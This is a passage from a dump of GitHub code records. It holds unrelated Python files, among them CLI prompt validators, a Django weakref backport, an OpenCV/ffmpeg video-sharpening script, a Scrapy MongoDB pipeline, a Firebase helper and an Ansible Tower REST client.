exit(0)\n","repo_name":"ylbs110/ExcelExportTool","sub_path":"Core/ExcelExportTool.py","file_name":"ExcelExportTool.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"63"} +{"seq_id":"40754809071","text":"# Create an empty set and print the type of it. Create a\r\n# set from a given dictionary(do set(given_dict)) and print it.\r\n# Note: The set created from the given dictionary contains\r\n# only the keys of the dictionary.\r\n\r\n\r\ndef set_creator(given_dict):\r\n empty_set = set()\r\n print(type(empty_set))\r\n dict_set = set(given_dict)\r\n print(dict_set)\r\n\r\n\r\nset_creator({1: \"Wall Street\", 2: \"Main Street\", \"Tower\": 3})\r\n","repo_name":"code4tomorrow/python","sub_path":"3_advanced/chapter17/solutions/set_creator.py","file_name":"set_creator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"75216017801","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport platform\nimport re\nimport sys\nimport textwrap\n\nfrom absl import flags\nfrom six.moves import input\nfrom six.moves import range\n\n# A Google Cloud Project ID must be between 6 and 30 characters, it cannot end\n# with a hyphen, it must begin with a letter, and must be all lower case\n# letters, numbers, and hyphens.\n_PROJECT_ID_REGEX = r'^[a-z][a-z0-9-]{4,28}[a-z0-9]$'\n_PROJECT_REQUIREMENTS = (\n 'the length must be between 6 and 30 lowercase letters, numbers, and '\n 'hyphens. The first character must be a letter. More information can be '\n 'found in the resource reference here: https://cloud.google.com'\n '/resource-manager/reference/rest/v1/projects#Project'\n)\n# An email address must include an `@` and a `.`.\n_EMAIL_REGEX = r'[^@]+@[^@]+\\.[^@]+'\n_EMAIL_REQUIREMENTS = 'an email address must include a `@` and `.`'\n# A Google OAuth2 Client ID must be lower case letters, numbers, and hypens\n# followed by '.apps.googleusercontent.com'.\n_CLIENT_ID_REGEX = r'^[a-z0-9-]+\\.apps\\.googleusercontent\\.com$'\n_CLIENT_ID_REQUIREMENTS = (\n 'the OAuth2 Client ID must be lowercase letters, numbers, and hypens '\n 'followed by `.apps.googleusercontent.com`'\n)\n# Version specifics can be found here:\n# https://cloud.google.com/appengine/docs/standard/python/config/appref\n# Characters allowed in the version string.\n# Lowercase letters, numbers, and hyphens.\n_VERSION_CHARS = frozenset((\n 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',\n 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4',\n '5', '6', '7', '8', '9', '0', '-',\n))\n# Version strings that are reserved or otherwise not allowed.\n_VERSION_BLACKLIST = frozenset(('default', 'latest'))\n# Version cannot start with ah-\n_VERSION_CANNOT_START_WITH = 'ah-'\n# Version requirements string.\n_VERSION_REQUIREMENTS = (\n 'the version string provided: {!r} does not meet the requirements.\\n'\n 'The version string can only be composed of lower case letters, numbers, '\n \"and hyphens. The strings 'default' and 'latest' are reserved and therefore\"\n \" not allowed. Finally, the version string may not begin with 'ah-'.\"\n)\n\n\ndef _wrap_lines(lines, wrapper=None):\n \"\"\"Wraps a multiline string.\n\n Args:\n lines: str, a multiline string to wrap.\n wrapper: textwrap.TextWrapper, the wrapper to use for wrapping and\n formatting.\n\n Returns:\n The formatted string.\n \"\"\"\n if wrapper is None:\n wrapper = textwrap.TextWrapper(\n break_on_hyphens=False,\n break_long_words=False,\n width=flags.get_help_width())\n result = '\\n'.join([wrapper.fill(line) for line in lines.splitlines()])\n if lines.endswith('\\n'):\n result += '\\n'\n return result\n\n\ndef write(message):\n \"\"\"Writes a message to stdout.\n\n Args:\n message: str, the message to write to stdout.\n \"\"\"\n sys.stdout.write(_wrap_lines(message) + '\\n')\n sys.stdout.flush()\n\n\ndef write_break():\n \"\"\"Writes a line break followed by a line of '-' and two more line breaks.\"\"\"\n write('')\n write(''.join(['-' for _ in range(0, flags.get_help_width(), 1)]))\n write('')\n\n\ndef clear_screen():\n \"\"\"Clears the screen of the running system.\"\"\"\n system = platform.system().strip().lower()\n if system == 'linux':\n write('\\033[H\\033[J')\n\n\ndef prompt(message, user_prompt=None, default=None, parser=None):\n \"\"\"Prompts the user for input.\n\n Args:\n message: str, the info message to display before prompting for user input.\n user_prompt: str, the prompt to display before input.\n default: str, the default value if no other input is provided.\n parser: Callable, an object to validate and parse the provided input.\n A parser must meet the following requirements:\n 1) The object must have a parse() method that accepts a single string\n as input and returns the parsed output.\n 2) Any error that occurs during parse() should raise a ValueError to\n indicate bad user input with a helpful error message.\n A working example can be found below as the 'YesNoParser'.\n\n Returns:\n The user provided input (optionally parsed).\n\n Raises:\n NameError: when the developer provided parser object does not provide the\n public `parse` method.\n \"\"\"\n if user_prompt is None:\n user_prompt = '>>>> '\n\n if default is not None:\n message = '{}\\nDefault: {}'.format(message, default)\n\n while True:\n write(message)\n user_input = input(user_prompt)\n if not user_input and default is not None:\n user_input = default\n if parser is None:\n break\n parse_method = getattr(parser, 'parse', None)\n if parse_method is None or not hasattr(parse_method, '__call__'):\n raise NameError(\n \"the object provided as a parser {!r} must have 'parse' as a public \"\n 'method'.format(parser))\n try:\n user_input = parser.parse(user_input)\n except ValueError as err:\n write(\"Invalid Response: '{}'\\nError: {}\\nPlease try again.\\n\".format(\n user_input, err))\n else:\n break\n write_break()\n return user_input\n\n\nclass Parser(object):\n \"\"\"A base parser object.\"\"\"\n\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\nclass YesNoParser(Parser):\n \"\"\"A Yes/No parser object.\"\"\"\n\n def __init__(self, need_full=False):\n self._need_full = need_full\n self._valid_yes = ('yes',) if need_full else ('y', 'yes')\n self._valid_no = ('no',) if need_full else ('n', 'no')\n\n def __repr__(self):\n return '<{0}({1!r})>'.format(self.__class__.__name__, self._need_full)\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n A boolean for whether or not the provided input is valid.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n if isinstance(arg, bool):\n return arg\n clean_arg = arg.strip().lower()\n if clean_arg in self._valid_yes:\n return True\n if clean_arg in self._valid_no:\n return False\n raise ValueError(\"the value {!r} is not a 'yes' or 'no'\".format(arg))\n\n\nclass StringParser(Parser):\n \"\"\"A string parser object.\"\"\"\n\n def __init__(self, allow_empty_string=False):\n self._allow_empty_string = allow_empty_string\n\n def __str__(self):\n return self.__class__.__name__\n\n def __repr__(self):\n return '<{0}(allow_empty_string={1!r})>'.format(\n self.__class__.__name__, self._allow_empty_string)\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n When overriding this public method in subclasses call self._parse() to\n utilize the string parser.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n The parsed string.\n \"\"\"\n return self._parse(arg)\n\n def _parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n The parsed string.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n clean_arg = arg.strip()\n if self._allow_empty_string or clean_arg:\n return clean_arg\n raise ValueError('the value {!r} is not a valid string'.format(arg))\n\n\nclass RegExParser(StringParser):\n \"\"\"A regular expression parser object.\"\"\"\n\n def __init__(self, regex, requirements):\n \"\"\"Initializes a regular expression parser.\n\n Args:\n regex: str, the regular expression to use when parsing values.\n requirements: str, the string used to describe the requirements of the\n regular expression in human terms.\n \"\"\"\n super(RegExParser, self).__init__(False)\n self._regex = regex\n self._requirements = requirements\n\n def __repr__(self):\n return ''.format(self._regex, self._requirements)\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n The parsed string.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n clean_arg = self._parse(arg)\n matched_arg = re.match(self._regex, clean_arg)\n if matched_arg:\n return matched_arg.string\n raise ValueError(\n 'the value provided ({!r}) does not match the requirements: {}'.format(\n arg, self._requirements))\n\n\nclass ProjectIDParser(RegExParser):\n \"\"\"A Google Cloud Project ID Parser to enforce Google's requirements.\"\"\"\n\n def __init__(self):\n super(ProjectIDParser, self).__init__(\n _PROJECT_ID_REGEX, _PROJECT_REQUIREMENTS)\n\n\nclass EmailParser(RegExParser):\n \"\"\"An email parser object.\"\"\"\n\n def __init__(self):\n super(EmailParser, self).__init__(_EMAIL_REGEX, _EMAIL_REQUIREMENTS)\n\n\nclass ClientIDParser(RegExParser):\n \"\"\"A Google OAuth2 Client ID parser object.\"\"\"\n\n def __init__(self):\n super(ClientIDParser, self).__init__(\n _CLIENT_ID_REGEX, _CLIENT_ID_REQUIREMENTS)\n\n\nclass VersionParser(Parser):\n \"\"\"A parser for the Google App Engine Version string.\"\"\"\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the version string to parse.\n\n Returns:\n The valid version string.\n\n Raises:\n ValueError: if the version string provided does not meet the requirements.\n \"\"\"\n clean_arg = arg.strip().lower()\n if clean_arg and set(clean_arg).issubset(_VERSION_CHARS):\n if clean_arg not in _VERSION_BLACKLIST:\n if not clean_arg.startswith(_VERSION_CANNOT_START_WITH):\n return clean_arg\n raise ValueError(_VERSION_REQUIREMENTS.format(arg))\n\n\nclass ListParser(flags.ListParser):\n \"\"\"A list parser object.\"\"\"\n\n def __init__(self, allow_empty_list=False):\n super(ListParser, self).__init__()\n self._allow_empty_list = allow_empty_list\n\n def __str__(self):\n return self.__class__.__name__\n\n def __repr__(self):\n return '<{0}(allow_empty_list={1!r})>'.format(\n self.__class__.__name__, self._allow_empty_list)\n\n def __eq__(self, other):\n return self.allow_empty_list == other.allow_empty_list\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def allow_empty_list(self):\n return self._allow_empty_list\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string of comma separated values to be parsed and validated.\n\n Returns:\n The parsed list.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n if not self._allow_empty_list and not arg:\n raise ValueError('an empty list is not allowed')\n return super(ListParser, self).parse(arg)\n\n\ndef prompt_yes_no(message, need_full=False, **kwargs):\n \"\"\"Prompts the user for a 'yes' or 'no' as a boolean.\n\n Args:\n message: str, the info message to display before prompting for user input.\n need_full: bool, whether or not the full word ('yes' or 'no') is required.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n True if the user responded with 'yes' and False if 'no'.\n \"\"\"\n return prompt(message, parser=YesNoParser(need_full=need_full), **kwargs)\n\n\ndef prompt_string(message, allow_empty_string=False, **kwargs):\n \"\"\"Prompts the user for a string.\n\n Args:\n message: str, the info message to display before prompting for user input.\n allow_empty_string: bool, whether or not the response is allowed to be an\n empty string.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided string.\n \"\"\"\n return prompt(message, parser=StringParser(allow_empty_string), **kwargs)\n\n\ndef prompt_project_id(message, **kwargs):\n \"\"\"Prompts the user for a Google Cloud Project ID.\n\n Args:\n message: str, the info message to display before prompting for user input.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided Google Cloud Project ID as a string.\n \"\"\"\n return prompt(message, parser=ProjectIDParser(), **kwargs)\n\n\ndef prompt_int(message, minimum=None, maximum=None, **kwargs):\n \"\"\"Prompts the user for an integer.\n\n Args:\n message: str, the info message to display before prompting for user input.\n minimum: int, the minimum accepted value.\n maximum: int, the maximum accepted value.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided int.\n \"\"\"\n parser = flags.IntegerParser(lower_bound=minimum, upper_bound=maximum)\n return prompt(message, parser=parser, **kwargs)\n\n\ndef prompt_csv(message, allow_empty_list=False, **kwargs):\n \"\"\"Prompts the user for a comma separated list of values.\n\n Args:\n message: str, the info message to display before prompting for user input.\n allow_empty_list: bool, whether or not an empty list is considered a valid\n value.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided list of values.\n \"\"\"\n return prompt(message, parser=ListParser(allow_empty_list), **kwargs)\n\n\ndef prompt_enum(message, accepted_values=None, case_sensitive=True, **kwargs):\n \"\"\"Prompts the user for a value within an Enum.\n\n Args:\n message: str, the info message to display before prompting for user input.\n accepted_values: List[Any], a list of accepted values.\n case_sensitive: bool, whether or not validation should require the response\n to be the same case.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided value from within the Enum.\n \"\"\"\n message += '\\nAvailable options are: {}'.format(', '.join(accepted_values))\n parser = flags.EnumParser(\n enum_values=accepted_values, case_sensitive=case_sensitive)\n return prompt(message, parser=parser, **kwargs)\n","repo_name":"google/loaner","sub_path":"loaner/deployments/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"63"} +{"seq_id":"36007327594","text":"from weakref import ref\n\n\nclass WeakMethod(ref):\n \"\"\"\n A custom `weakref.ref` subclass which simulates a weak reference to\n a bound method, working around the lifetime problem of bound methods.\n \"\"\"\n\n __slots__ = \"_func_ref\", \"_meth_type\", \"_alive\", \"__weakref__\"\n\n def __new__(cls, meth, callback=None):\n try:\n obj = meth.__self__\n func = meth.__func__\n except AttributeError:\n raise TypeError(\"argument should be a bound method, not {}\"\n .format(type(meth)))\n def _cb(arg):\n # The self-weakref trick is needed to avoid creating a reference\n # cycle.\n self = self_wr()\n if self._alive:\n self._alive = False\n if callback is not None:\n callback(self)\n self = ref.__new__(cls, obj, _cb)\n self._func_ref = ref(func, _cb)\n self._meth_type = type(meth)\n self._alive = True\n self_wr = ref(self)\n return self\n\n def __call__(self):\n obj = super(WeakMethod, self).__call__()\n func = self._func_ref()\n if obj is None or func is None:\n return None\n return self._meth_type(func, obj)\n\n def __eq__(self, other):\n if isinstance(other, WeakMethod):\n if not self._alive or not other._alive:\n return self is other\n return ref.__eq__(self, other) and self._func_ref == other._func_ref\n return False\n\n def __ne__(self, other):\n if isinstance(other, WeakMethod):\n if not self._alive or not other._alive:\n return self is not other\n return ref.__ne__(self, other) or self._func_ref != other._func_ref\n return True\n\n __hash__ = ref.__hash__\n","repo_name":"JaniceWuo/MovieRecommend","sub_path":"movierecommend/venv1/Lib/site-packages/django/dispatch/weakref_backports.py","file_name":"weakref_backports.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":575,"dataset":"github-code","pt":"63"} +{"seq_id":"41610134839","text":"#高斯双边滤波,锐化\nimport cv2\nimport numpy as np\nimport os\nimport subprocess\n\n\npath = \"/home/bili/\" #路径\nfilename = \"aoyi.mp4\" #需要转换视频文件名\noutfilename = \"aoyi4full.mp4\"\n\nvc = cv2.VideoCapture(path+filename) #读取视频文件\n\nw = vc.get(cv2.CAP_PROP_FRAME_WIDTH) #视频宽\nw = int(w/3)\n\nh = vc.get(cv2.CAP_PROP_FRAME_HEIGHT) #视频高\n\nfps = vc.get(cv2.CAP_PROP_FPS) #视频帧率\n\n#写视频文件\nfourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\noutname = \"aoyi4out.mp4\" #此视频文件无声,完成后可以删除\nvw4 = cv2.VideoWriter(path+outname, fourcc, int(fps*2), (int(w*2.4), int(h*2.4)), isColor=True)\n\nwhile vc.isOpened():\n retval, image = vc.read()\n if not retval:\n break\n img = np.zeros((int(h), int(w), 3))\n img = image[:, w:w+w, :]\n img4 = cv2.resize(img, dsize=(int(w*2.4), int(h*2.4)), interpolation=cv2.INTER_CUBIC)\n print(image.shape, img.shape, img4.shape)\n \n #几个卷积核可以不同效果\n kernel = np.reshape(np.array([0, -1, 0, -1, 5, -1, 0, -1, 0]), (3, 3))\n #kernel = np.reshape(np.array([-1, -2, -1, -2, 13, -2, -1, -2, -1]), (3, 3))\n #kernel = np.reshape(np.array([-1, -1, -1, -1, 9, -1, -1, -1, -1]), (3, 3))\n #kernel = np.reshape(np.array([0, 0, -1, 0, 0, 0, -1, -2, -1, 0, -1, -2, 17, -2, -1, 0, -1, -2, -1, 0, 0, 0, -1, 0, 0]), (5, 5))\n img4 = cv2.filter2D(img4, -1, kernel)\n \n vw4.write(img4)\n vw4.write(img4)\n \n #cv2.imshow(\"xiao\", img)\n key = cv2.waitKey(0)\n if key == ord(\"q\"):\n break\n\nvc.release()\nvw4.release()\ncv2.destroyAllWindows()\n\n#音频文件名\nm4aname = \"aoyiout.m4a\"\n#提取视频文件的音频\nsubprocess.run([\"ffmpeg\", \"-i\", path+filename, \"-vn\", \"-codec\", \"copy\", path+m4aname]) \n#把提取音频文件和新视频文件合并\nsubprocess.run([\"ffmpeg\", \"-i\", path+outname, \"-i\", path+m4aname, \"-c:v\", \"copy\", \"-c:a\", \"aac\", \"-strict\", \"experimental\", path+outfilename])\nexit()\n\n","repo_name":"xialibing/bili_shuping","sub_path":"bili.py","file_name":"bili.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70593011402","text":"\"\"\"DAO classes.\"\"\"\nfrom .user import UserDAO\nfrom .country import CountryDAO\nfrom .city import CityDAO\nfrom .category import CategoryDAO\nfrom .subcategory import SubcategoryDAO\n\n__all__ = [\n 'UserDAO',\n 'user_repository',\n 'CountryDAO',\n 'country_repository',\n 'CityDAO',\n 'city_repository',\n 'CategoryDAO',\n 'category_repository',\n 'SubcategoryDAO',\n 'subcategory_repository',\n]\n\nuser_repository = UserDAO()\ncountry_repository = CountryDAO()\ncity_repository = CityDAO()\ncategory_repository = CategoryDAO()\nsubcategory_repository = SubcategoryDAO()\n","repo_name":"gizyatullov/api-users","sub_path":"fastapi_template/db/dao/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2456498816","text":"import re\nfrom enum import Enum\nfrom typing import List, NamedTuple\n\nimport libkol\n\nfrom .request import Request\nfrom ..util import parsing\n\nresponse_pattern = re.compile(r\"You sell your (.*?) to (?:.*?) for ([0-9,]+) Meat.\")\n\n\nclass Response(NamedTuple):\n items: List[\"libkol.types.ItemQuantity\"]\n meat_gained: int\n\n\nclass AutosellMode(Enum):\n All = 1\n AllButOne = 2\n Quantity = 3\n\n\nclass autosell_items(Request[Response]):\n \"\"\"\n Sells items via the autosell system\n \"\"\"\n\n def __init__(\n self,\n session: \"libkol.Session\",\n items: List[\"libkol.Item\"],\n quantity: int = 1,\n all: bool = False,\n keep_one: bool = False,\n ):\n params = {\"action\": \"sell\"}\n\n if keep_one:\n params[\"mode\"] = AutosellMode.AllButOne.value\n elif all:\n params[\"mode\"] = AutosellMode.All.value\n else:\n params[\"mode\"] = AutosellMode.Quantity.value\n params[\"quantity\"] = str(quantity)\n\n for item in items:\n params[\"item{}\".format(item.id)] = str(item.id)\n\n self.request = session.request(\"sellstuff_ugly.php\", pwd=True, params=params)\n\n @staticmethod\n async def parser(\n content: str, items: List[\"libkol.Item\"] = [], **kwargs\n ) -> Response:\n from libkol.types import ItemQuantity\n\n response_match = response_pattern.search(content)\n\n if response_match is None:\n return Response([], 0)\n\n item_quantities = [] # type: List[\"libkol.types.ItemQuantity\"]\n\n for item in items:\n pattern = re.compile(\n r\"(?:(?:([0-9,]+) {})|{})(?:,|$)\".format(\n re.escape(item.pluralize()), re.escape(str(item.name))\n )\n )\n match = pattern.search(response_match.group(1))\n quantity = (\n 0\n if match is None\n else 1\n if match.group(1) is None\n else parsing.to_int(match.group(1))\n )\n item_quantities += [ItemQuantity(item, quantity)]\n\n return Response(\n items=item_quantities, meat_gained=parsing.to_int(response_match.group(2))\n )\n","repo_name":"python-kol/libkol","sub_path":"libkol/request/autosell_items.py","file_name":"autosell_items.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"42255342179","text":"# encoding=utf-8\nimport pymongo\nfrom items import InformationItem, TweetsItem, FollowsItem, FansItem\n\nclass MongoDBPipleline(object):\n def __init__(self):\n client = pymongo.MongoClient(\"localhost\", 27017)\n db = client[\"Sina\"]\n self.Information = db[\"Information\"]\n self.Tweets = db[\"Tweets\"]\n self.num = 0\n # self.Follows = db[\"Follows\"]\n # self.Fans = db[\"Fans\"]\n\n def process_item(self, item, spider):\n \"\"\" 判断item的类型,并作相应的处理,再入数据库 \"\"\"\n # inf = InformationItem()\n # print(isinstance(inf, InformationItem), type(InformationItem),type(inf))\n # print(\"process item....:\",type(item), isinstance(item,InformationItem),isinstance(item, TweetsItem), type(item)==TweetsItem)\n if isinstance(item, InformationItem) or item.type == 1:\n try:\n self.Information.insert_one(dict(item))\n # print(\"information\")\n except Exception:\n pass\n elif isinstance(item, TweetsItem) or item.type ==2 :\n try:\n self.Tweets.insert_one(dict(item))\n except Exception as e:\n print(e)\n try:\n with open(\"E:\\\\tasks\\\\PPGCN\\\\Data\\\\trainData\\\\event_\"+str(self.num)+\".txt\",\"w\") as f:\n # 第0行:发布时间; 第1行:微博内容; 第2行:文本属性; 第3行:label\n content = str(dict(item))\n f.write(content)\n f.close()\n self.num += 1\n # print(\"tweets\")\n except Exception as e:\n print(e)\n # elif isinstance(item, FollowsItem):\n # followsItems = dict(item)\n # follows = followsItems.pop(\"follows\")\n # for i in range(len(follows)):\n # followsItems[str(i + 1)] = follows[i]\n # try:\n # self.Follows.insert(followsItems)\n # except Exception:\n # pass\n # elif isinstance(item, FansItem):\n # fansItems = dict(item)\n # fans = fansItems.pop(\"fans\")\n # for i in range(len(fans)):\n # fansItems[str(i + 1)] = fans[i]\n # try:\n # self.Fans.insert(fansItems)\n # except Exception:\n # pass\n return item\n","repo_name":"asevergreen/GCN","sub_path":"Sina_spider1/Sina_spider1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5001378692","text":"with open(\"27-110a.txt\") as F:\n N, K = map(int, F.readline().split())\n data = []\n for i in range(N):\n a, b = map( int, F.readline().split() )\n data.append( (a, b) )\n\ndef rec( pos, Lplus = 0 ):\n if pos >= N: return 0\n res0 = rec( pos+1, Lplus )\n resx = data[pos][1] + rec( pos+1, 0 )\n res = res0 if res0 > resx else resx\n if Lplus < K:\n res1 = data[pos][0] + rec(pos+1, Lplus+1)\n res = max(res, res1)\n return res\n\nprint( rec(0) )\n\n# Если нужно увидеть, какие значения выбирались...\n\"\"\"\ndef rec( pos, Lplus = 0, prog = '' ):\n if pos >= N: return (0, prog)\n res0, prog0 = rec( pos+1, Lplus, prog + '0' )\n resx, progx = rec( pos+1, 0, prog + 'x' )\n resx += data[pos][1]\n res, newProg = (res0, prog0) if res0 > resx else \\\n (resx, progx)\n if Lplus < K:\n res1, prog1 = rec(pos+1, Lplus+1, prog + '1')\n res1 += data[pos][0]\n if res1 > res:\n res, newProg = res1, prog1\n\n return res, newProg\n\nprint( *rec(0) )\n\"\"\"","repo_name":"notjik/informatics","sub_path":"classworks/ege/27ege/data/110/27-110bad.py","file_name":"27-110bad.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"34067651991","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom MissRaya.vars import FDBURL\n\n\ncred = credentials.Certificate(\n 'Database.json')\n\nfirebase_admin.initialize_app(cred, {\n 'databaseURL': f'{FDBURL}'\n})\n\n# Main Ref\nref = db.reference('MissRaya/')\n\n# Users and Groups\nGrps = ref.child('Groups/')\nUsers = ref.child('Users/')\n\n# All Users And Admins\nAll = Users.child('All/')\nAdmins = Users.child('Admins/')\n\n# Data Ref\nData = ref.child('Data/')\n\n# Funcs\ndef AddGroup(Title: str, ID: int):\n data = {ID: Title}\n Grps.update(data)\n print(f'Added {Title} to Database')\n\n\ndef AddUser(Username: str, ID: int):\n data = {ID: Username}\n All.update(data)\n print(f'Added User @{Username} to Database')\n\n\ndef AddAdmin(Username: str, ID: int):\n data = {ID: Username}\n Admins.update(data)\n print(f'Promoted User @{Username} As Admin')\n\n\ndef GetGrps():\n data = Grps.get()\n return data\n\n\ndef GetUsers():\n data = All.get()\n return data\n\n\ndef GetAdmins():\n data = Admins.get()\n return data\n\n\ndef RemUser(Id):\n data = All.get()\n data.pop(Id, None)\n All.set(data)\n","repo_name":"TharukRenuja/MissRaya","sub_path":"MissRaya/helpers/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"63"} +{"seq_id":"28647700106","text":"\"\"\"Tower API module interacts using the REST API to\n 1. Get a single object\n 2. Get multiple objects with pagination info\n 3. POST a Job Template/Workflow\n\"\"\"\nfrom pathlib import Path\nfrom distutils.util import strtobool\nfrom django.conf import settings\nimport requests\n\nrequests.packages.urllib3.disable_warnings()\n\n\nclass TowerAPI:\n \"\"\"TowerAPI class supports GET/POST to tower given a slug\"\"\"\n\n VALID_POST_CODES = [200, 201, 202]\n VALID_GET_CODES = [200]\n\n def __init__(self, url=None, token=None, verify_ssl=None):\n if url is None:\n url = settings.CONTROLLER_URL\n self.url = url.rstrip(\"/\")\n\n if token is None:\n token = settings.CONTROLLER_TOKEN\n\n if verify_ssl is None:\n verify_ssl = settings.CONTROLLER_VERIFY_SSL\n\n if Path(verify_ssl).is_file():\n self.verify_ssl = verify_ssl\n else:\n self.verify_ssl = bool(strtobool(verify_ssl))\n\n self.headers = {\"Authorization\": f\"Bearer {token}\"}\n\n self.attr_delimiter = \".\"\n\n def get(self, obj_url, attrs):\n \"\"\"This generator function fetches objects from multiple pages and\n yields one object at a time to the caller\n \"\"\"\n next_url = obj_url\n try:\n while next_url:\n response = requests.get(\n f\"{self.url}{next_url}\",\n headers=self.headers,\n verify=self.verify_ssl,\n )\n if response.status_code in self.VALID_GET_CODES:\n data = response.json()\n next_url = data.get(\"next\", None)\n if \"results\" in data:\n for payload in data[\"results\"]:\n yield self._filtered(payload, attrs)\n else:\n yield self._filtered(data, attrs)\n else:\n raise RuntimeError(\n \"GET failed %s status %s body %s\"\n % (next_url, response.status_code, response.text)\n )\n except requests.exceptions.RequestException as exc:\n raise exc\n\n def post(self, slug, payload, attrs):\n \"\"\"Post to a URL and get the response back\n the payload is a python dictionary and will be\n sent up as json\n \"\"\"\n try:\n response = requests.post(\n f\"{self.url}{slug}\",\n headers=self.headers,\n verify=self.verify_ssl,\n json=payload,\n )\n if response.status_code in self.VALID_POST_CODES:\n data = response.json()\n return self._filtered(data, attrs)\n\n raise RuntimeError(\n \"POST failed %s status %s body %s\"\n % (slug, response.status_code, response.text)\n )\n except requests.exceptions.RequestException as exc:\n raise exc\n\n def _filtered(self, payload, attrs):\n \"\"\"Build an object by filtering out unwanted variables\"\"\"\n obj = {}\n for attr in attrs:\n if self.attr_delimiter in attr:\n data = payload\n for key in attr.split(self.attr_delimiter):\n if key in data:\n data = data[key]\n else:\n data = None\n break\n obj[attr] = data\n else:\n obj[attr] = payload.get(attr, None)\n return obj\n","repo_name":"ansible/pinakes","sub_path":"pinakes/main/inventory/task_utils/tower_api.py","file_name":"tower_api.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"23557200517","text":"\"\"\"\nMacroParse will be built atop the existing \"mini\" parsing and scanning tools.\nIt extends the language of attributed context-free grammars with additional features described on the wiki page.\n\nThe design for this module is still in flux, although most of the main ideas are laid out.\nThe concept is a single-file definition of both lexical and syntactic analysis embedded within MarkDown text.\n\nMarkdown as a container format is straightforward to analyze with available string operations or\nsimple applications of standard Python regex machinery. However, the miniscan/miniparse machinery is\nextremely handy for recovering the syntactic structure of actual rules, so that's used here.\n\n========================================\n\n\"\"\"\nimport re, os, collections\nfrom typing import NamedTuple, List\nfrom ..support import foundation, failureprone\nfrom ..parsing.context_free import ContextFreeGrammar\nfrom ..parsing.automata import DragonBookTable, ParsingStyle, GeneralizedStyle, DeterministicStyle, HFA, tabulate\nfrom ..scanning import finite, regular, charset\nfrom ..scanning.interface import INITIAL\nfrom . import grammar, compaction\nfrom .interface import ScanAction\n\n\nclass TextBookForm:\n\t\"\"\" This provides the various views of the text-book form of scan and parse tables. \"\"\"\n\tdef __init__(self, *, dfa: finite.DFA, scan_actions:List[ScanAction], parse_table: DragonBookTable):\n\t\tself.dfa = dfa\n\t\tself.scan_actions = scan_actions\n\t\tself.parse_table = parse_table\n\tdef as_compact_form(self, *, filename):\n\t\treturn {\n\t\t\t'description': 'MacroParse Automaton',\n\t\t\t'version': (0, 0, 3),\n\t\t\t'source': filename,\n\t\t\t'scanner': self.compact_scanner(),\n\t\t\t'parser': self.compact_parser(),\n\t\t}\n\tdef compact_scanner(self):\n\t\tdfa = self.dfa\n\t\tif dfa is None: return\n\t\treturn {\n\t\t\t'dfa': compaction.compress_scanner(initial=dfa.initial, matrix=dfa.states, final=dfa.final),\n\t\t\t'action': dict(zip(ScanAction._fields, zip(*self.scan_actions))),\n\t\t\t'alphabet': {'bounds': dfa.alphabet.bounds, 'classes': dfa.alphabet.classes,}\n\t\t}\n\tdef compact_parser(self):\n\t\ttable = self.parse_table\n\t\tif table is None: return\n\t\tsymbol_index = {s: i for i, s in enumerate(table.terminals + table.nonterminals)}\n\t\tsymbol_index[None] = None\n\t\tform = 